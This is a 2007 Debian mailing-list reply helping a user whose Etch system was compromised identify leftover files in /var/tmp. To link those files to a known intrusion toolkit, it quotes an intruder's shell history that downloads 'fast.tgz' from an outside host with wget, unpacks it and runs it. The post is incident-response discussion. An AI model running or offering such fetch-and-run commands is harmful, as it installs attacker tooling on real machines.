Re: files in /var/tmp
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Sun, Apr 08, 2007 at 03:44:33PM -0700, Kamaraju Kusumanchi wrote:
> Hi all
>
> Can someone throw some light on as to what does /var/tmp/fast-mech.tgz and /var/tmp/raw directories do?
>
> My system (Debian Etch) has been recently compromised and I deleted most of the suspicious files. However I am not sure about these. Is it safe to delete them or do you think some process expects them to be there?
>
> According to FHS 2.3, files in /var/tmp are preserved across reboots and applications might expect some temp files there. Other than that, I could not find any other info on fast-mech.tgz file and on /var/tmp/raw directory...
>
>
> $ls -al fast-mech.tgz raw
> -rw-r--r-- 1 rajulocal rajulocal 165248 2007-02-04 20:51 fast-mech.tgz
I found this page interesting[0], the last line mentiones 'fastmech'.
...
ls -a
wget www.generatiapro.go.ro/fast.tgz
tar zxvf fast.tgz
cd fastmech
bash
...
- -K
[0]
http://archives.neohapsis.com/archives/fulldisclosure/2004-08/1126.html
- --
| .''`. == Debian GNU/Linux == | my web site: |
| : :' : The Universal |mysite.verizon.net/kevin.mark/|
| `. `' Operating System | go to counter.li.org and |
| `- http://www.debian.org/ | be counted! #238656 |
| my keyserver: subkeys.pgp.net | my NPO: cfsg.org |
|join the new debian-community.org to help Debian! |
|_______ Unless I ask to be CCd, assume I am subscribed _______|
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFGGhmav8UcC1qRZVMRArNAAJ9kAFB/hISE7N7jFJtL4/EqVPjhOACffTIY
Tn3UIqU1XrsWY7yEjQEpg0g=
=FLVq
-----END PGP SIGNATURE-----
Reply to: